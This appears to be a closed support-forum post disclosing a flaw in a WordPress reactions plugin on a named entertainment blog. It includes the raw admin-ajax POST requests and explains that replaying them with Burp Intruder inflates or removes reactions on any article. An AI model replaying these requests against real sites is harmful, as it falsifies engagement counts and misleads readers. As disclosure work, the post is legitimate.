Functionality Abuse

  • Description: Abuse of Functionality is an attack technique that uses a web site’s own features and functionality to attack itself or others. Abuse of Functionality can be described as the abuse of an application’s intended functionality to perform an undesirable outcome.
    Proof of Concept:
    As a proof of concept let us take a article URL : https://entertainmentblog.paytm.com/2017/03/16/mightier-grander-power-packed-baahubali-2-trailer-out/
    Below this article there is an option to react on this article with various options. People read the article and react on it and that also gives an impression of article for other people.
    The functionality “React” and “Unreact” can be repeated for “n” number of times for an article.
    When we react on above URL the HTTP request which goes is :
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: xxxxxx
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: /
    Accept-Language: en-US,en;q=0.5
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: xxxxxxx
    Content-Length: 55
    Cookie:
    Connection: close
    postid=1470&action=rns_react&reaction=love&unreact=false

    With the help of Intruder we can replay this request (With Null Payload) for n number of times to increase a particular reaction for the article.

    Similarly when we “unreact” to any article the HTTP request which goes is :
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: xxxxx
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: /
    Accept-Language: en-US,en;q=0.5
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: xxxxx
    Content-Length: 55
    Cookie:
    Connection: close
    postid=1470&action=rns_react&reaction=love&unreact=true

    We can also intrude this with null payloads and can decrease any reaction on any article. It will be possible for an user to decrease/increase the reactions given by other people on any article.

    The page I need help with: [log in to see the link]

  • The topic ‘Functionality Abuse’ is closed to new replies.